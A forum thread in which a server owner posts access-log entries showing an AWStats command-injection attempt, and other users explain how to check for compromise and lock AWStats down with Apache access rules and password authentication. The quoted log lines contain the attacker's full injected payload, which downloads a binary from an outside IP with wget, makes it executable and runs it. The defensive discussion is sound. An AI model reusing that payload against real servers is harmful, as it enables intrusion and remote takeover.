Hacked? Or Not?
68.248.81.236 - - [18/Feb/2006:18:07:46 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2066%2e129%2e45%2e213%2fgicule%3bchmod%20%2bx%20gicule%3b%2e%2fgicule;echo%20YYY;echo| HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
68.248.81.236 - - [18/Feb/2006:18:07:48 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2066%2e129%2e45%2e213%2fgicule%3bchmod%20%2bx%20gicule%3b%2e%2fgicule;echo%20YYY;echo| HTTP/1.1" 200 760 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
68.248.81.236 - - [18/Feb/2006:18:07:50 +1100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2066%2e129%2e45%2e213%2fgicule%3bchmod%20%2bx%20gicule%3b%2e%2fgicule;echo%20YYY;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
I'm fairly certain this is an attempted hack, but the 404 errors lead me to believe it was unsuccessful, but there is a 200 error as well?
Any Ideas?
Cheers.
7 Replies
To see for sure if it worked, look in your /tmp directory. If you see a file named gicule, then the exploit worked. There'll also be a process running named gicule. Kill it immediately.
The company that hosts that file seems to have taken action against the person hosting it, since the file it downloads is now not accessible. This is good, but if you have the file it means I can't tell you what it does. Therefore it's probably best to assume the worst until proven otherwise. Typically these scripts run shells that people can use to perhaps root your box.
Keep us posted.
I'm thinking that the exploit was unsuccessful, and I hope so, I just got my server working the way I want, I've spent quite some time learning it, but I actually need to start using it very soon, so I am concerned.
Is there any other way of knowing if this was successful?
Cheers.
Technically, it's possible that the script might delete itself after use or that anybody using the shell might delete the file afterwards. Few are intelligent enough to do this, though. I would take Beek's advice and check your firewall logs if you have them and they log connections. If they don't, then I'm not sure that there's a definitive way to tell if you've been compromised or not.
I would probably assume you're okay. But for next time, paassword-protect AWStats if possible, or move it into another directory. Same for other obviously-named scripts. Either will protect you from that sort of thing again.
Oh well better get compiling so I can have as little downtime as possible.
Cheers guys.
If so, I'd use your main apache config or an .htaccess file to limit access to that dir by ip address. I believe this will work with the
Order Deny,Allow
Deny From All
Allow 128.101.101.101
where 128.101.101.101 is the ip you want access it from should work. If you get a new IP on your connection at home, you'll have to change that. Not a big deal considering it renders all attacks like this useless.
I removed AWStats since it's an unnecessary risk for the small service it provides, but if you need statistics, you can apply access control like the previous poster suggested. Try this:
<location cgi-bin="" awstats.pl="">Order Deny,Allow
Deny From All
Allow 1.2.3.4</location>
to allow by IP address, or use password authentication, like this:
<location cgi-bin="" awstats.pl="">AuthType Basic
AuthName "AWStats"
AuthUserFile /path/to/passwd_file
require valid-user</location>
You can use "htpasswd -c /path/to/passwd_file username" to set the password.
You dodged a bullet this time, but you should do something because AWStats will likely have more exploits in the future, and you don't want to turn your LVS into a spambot!